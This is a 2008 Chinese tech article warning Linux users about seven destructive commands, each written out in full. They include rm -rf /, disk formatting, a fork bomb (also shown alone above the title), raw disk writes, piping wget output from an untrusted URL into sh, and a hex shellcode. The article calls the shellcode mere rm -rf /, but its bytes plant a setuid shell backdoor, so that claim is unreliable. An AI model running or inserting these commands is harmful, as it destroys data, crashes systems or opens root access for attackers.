:(){:|:&};:


命令：七个极具杀伤性的Linux系统命令
发布时间：2008.11.24 07:38     来源：赛迪网    作者：上帝

【赛迪网-技术社区整理】如果您使用Linux，可千万要记得不要让傻孩子们敲入以下命令，尽管这些命令看上去相当复杂，但还是会对你的系统造成严重影响。

有一些会影响你的程序和系统运行，有一些会直接把你的盘抹掉，这些命令几乎没有什么可以挽回的余地。

1. Code：

rm -rf /


这个很简单,根目录会被擦光。

2. Code：

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


没看懂?呵呵,其实就是16进制的[rm -rf /]。

3. Code：

mkfs.ext3 /dev/sda


抹盘行为无疑是危险的。

4. Code：

:(){:|:&};:


这不是90后的表情,也不是托蒂射点球前的表情,它可以让你的系统迅速因为处理大量数据而死机。

5. Code：

any_command > /dev/sda


这个命令将会写入大量的RAW数据,可以导致数据丢失。

6. Code：

wget http://some_untrusted_source -O- | sh


和Windows一样,千万不要乱下载未经证实安全性的源,这年头Linux和胡萝卜一样,也不会保险。

7. Code：

mv /home/yourhomedirectory/* /dev/null


这条命令无疑会让系统抓狂,你的主目录会再也看不到。

---------------------------------------------------------------------

如果您有操作系统资料、建议或是相关最新技术信息等等，请联系赛迪网IT技术--操作系统频道，我们会在第一时间发布、分享给广大网友。 
